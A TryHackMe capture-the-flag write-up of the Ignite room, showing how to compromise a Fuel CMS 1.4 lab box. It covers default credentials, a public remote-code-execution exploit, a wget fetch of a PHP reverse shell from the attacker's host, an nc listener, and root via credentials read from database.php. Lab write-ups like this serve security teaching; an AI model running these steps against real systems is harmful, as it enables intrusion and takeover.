Ignite — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my Ignite — TryHackMe — Writeup. Check it out!

First, let nmap to see which ports the machine is opening.

nmap -A -T5 -v <ip>

nmap

We see there is a port 80. So let’s access its website.

website

Now i know the website is running CMS Fuel version 1.4. This will be important for us to search for exploit.

Click Ctrl+U to view page source and find some interesting information.

View Source

Now I have the admin login page and password. Access to http://<ip>/fuel/login and login with the credential admin:admin

admin site

Now I’m in. I’ve tried to upload a shell into the machine through this admin site, but it didn’t work. So I will try another way. Let’s search for CMS exploit using searchsploit

searchsploit CMS fuel

searchsploit

I see an Remote Code Execution exploit which matches our CMS version. So let’s google this and download the python script from:

Offensive Security's Exploit Database Archive

Execute the python script and we can execute command in the target machine. Now input the cmd “pwd” to see which folder we are in now.

pwd

We are in the website folder. Which means that if we can upload a shell here, we can access the shell directly from our browser.

Let’s spawn a http server using python http.server (if you are using python 3) or SimpleHTTPServer (if you are using python 2). Cd to the folder contains your php reverse shell and type this cmd:

python http.server 9000 (python 3)

python SimpleHTTPServer 9000 (python 2)

Now let’s download the shell into our machine using wget. Change the cmd in the python script like this:

wget http://<host-ip>:9000/php-reverse-shell.php

*Remember the host-ip is your Tryhackme VPN IP, not your real IP. You can find your VPN ip by accessing 10.10.10.10

Now use nc to open a listener:

nc -lvnp 4444

Run the script and then access in your web browser:

http://<machine-ip>/php-reverse-shell.php

shell

Now that we have our shell! Let’ explore and get the user.txt flag.

user.txt

We need to get root to find the root.txt flag which placed in the /root folder.

You can find root credential under /var/www/html/fuel/application/config/database.php

database.php

In order to su root, you need a tty. Spawn a tty using python:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Then su root using the credential above.

get root

cd to /root and cat the root.txt file.

root.txt

The end.

HAPPY HACKING